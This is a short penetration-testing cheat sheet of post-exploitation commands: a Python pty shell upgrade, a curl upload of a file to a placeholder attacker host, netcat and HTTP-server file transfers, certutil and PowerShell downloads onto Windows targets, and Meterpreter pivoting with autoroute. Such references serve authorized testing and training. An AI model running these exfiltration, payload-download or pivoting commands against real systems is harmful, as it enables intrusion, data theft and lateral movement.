Spawn Better Shell

PYTHON

python3 -c 'import pty; pty.spawn("/bin/bash")';export TERM=xterm
Ctrl + Z
stty raw -echo; fg
Spawn a better shell (tab, history, ...).

Extract File from Target

CURL

curl [ATTACKER_IP]:[ATTACKER_PORT] -F 'data=@fmyFile'
Send myFile to an netcat listener.

Upload File on Target

NETCAT

nc -l -p [TARGET_PORT] > newFile
Run on Target.

nc [TARGET_IP] [TARGET PORT] < myFile
Run on Attacker machine. Send a file on the target.

PYTHON

python3 -m http.server [ATTACKER_PORT]
Run on attacker machine (at the file location).

wget http://[ATTACKER_IP]:[ATTACKER_PORT]/myFile
Get the file on a Linux target machine.

certutil.exe -urlcache -f http://[ATTACKER_IP]:[ATTACKER_PORT]/myFile myFile
or
powershell -c wget "http://[ATTACKER_IP]:[ATTACKER_PORT]/myFile" -outfile "myFile"
or
powershell -c "(new-object System.Net.WebClient).Downloadfile('http://[ATTACKER_IP]:[ATTACKER_PORT]/myFile', 'myFile')"
Get the file on a Windows target machine.

MIMIKATZ

METERPRETER

upload
Upload a file or directory.

download
Download a file or directory.

Pivoting

METERPRETER

When we have a meterpreter shell on a machine that has access to another network, we can use it to gain access to the 2nd network.

run autoroute -s [REMOTE_NETWORK]/24
Create a route via the host that we had access to.

run autoroute -p
Show added routes.

Spawn Better Shell#

PYTHON#

Extract File from Target#

CURL#

Upload File on Target#

NETCAT#

PYTHON#

MIMIKATZ#

METERPRETER#

Pivoting#

METERPRETER#

Spawn Better Shell

PYTHON

Extract File from Target

CURL

Upload File on Target

NETCAT

PYTHON

MIMIKATZ

METERPRETER

Pivoting

METERPRETER